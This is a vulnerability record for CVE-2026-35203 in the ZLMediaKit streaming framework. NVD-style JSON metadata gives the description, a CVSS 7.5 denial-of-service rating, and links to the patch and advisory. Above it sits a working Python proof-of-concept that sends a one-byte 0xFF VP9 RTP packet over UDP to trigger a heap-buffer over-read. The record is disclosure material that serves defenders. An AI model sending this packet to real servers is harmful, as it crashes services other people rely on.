CVE-2026-35203

import socket import struct # Construct a malicious VP9 RTP packet # RTP Header (12 bytes) + Payload (1 byte: 0xFF) # V=2, P=0, X=0, CC=0, M=0, PT=96 (Dynamic), Seq=1, TS=0, SSRC=1 def create_malicious_packet(): rtp_header = struct.pack('!BBHII', 0x80, # Version 2, No padding, No extension, No CSRC 96, # Payload Type (Dynamic) 1, # Sequence Number 0, # Timestamp 1 # SSRC ) # Malicious Payload: 0xFF sets all flags, indicating many fields follow, # but no data is provided, causing buffer over-read. payload = b'\xFF' return rtp_header + payload def send_exploit(target_ip, target_port): packet = create_malicious_packet() sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: print(f"Sending malicious packet to {target_ip}:{target_port}") sock.sendto(packet, (target_ip, target_port)) except Exception as e: print(f"Error: {e}") finally: sock.close() if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "127.0.0.1" TARGET_PORT = 10000 send_exploit(TARGET_IP, TARGET_PORT)

{"cve": {"id": "CVE-2026-35203", "sourceIdentifier": "[email protected]", "published": "2026-04-06T20:16:28.057", "lastModified": "2026-04-16T04:21:41.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZLMediaKit is a streaming media service framework. the VP9 RTP payload parser in ext-codec/VP9Rtp.cpp reads multiple fields from the RTP payload based on flag bits in the first byte, without verifying that sufficient data exists in the buffer. A crafted VP9 RTP packet with a 1-byte payload (0xFF, all flags set) causes the parser to read past the end of the allocated buffer, resulting in a heap-buffer-overflow. This vulnerability is fixed with commit 435dcbcbbf700fd63b2ca9eac6cef3b5ea75169d."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zlmediakit:zlmediakit:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-03-29", "matchCriteriaId": "C6E40C41-1CFE-4C61-9948-9BC843FBF1BC"}]}]}], "references": [{"url": "https://github.com/ZLMediaKit/ZLMediaKit/commit/435dcbcbbf700fd63b2ca9eac6cef3b5ea75169d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ZLMediaKit/ZLMediaKit/security/advisories/GHSA-gxr3-fwc7-q99h", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}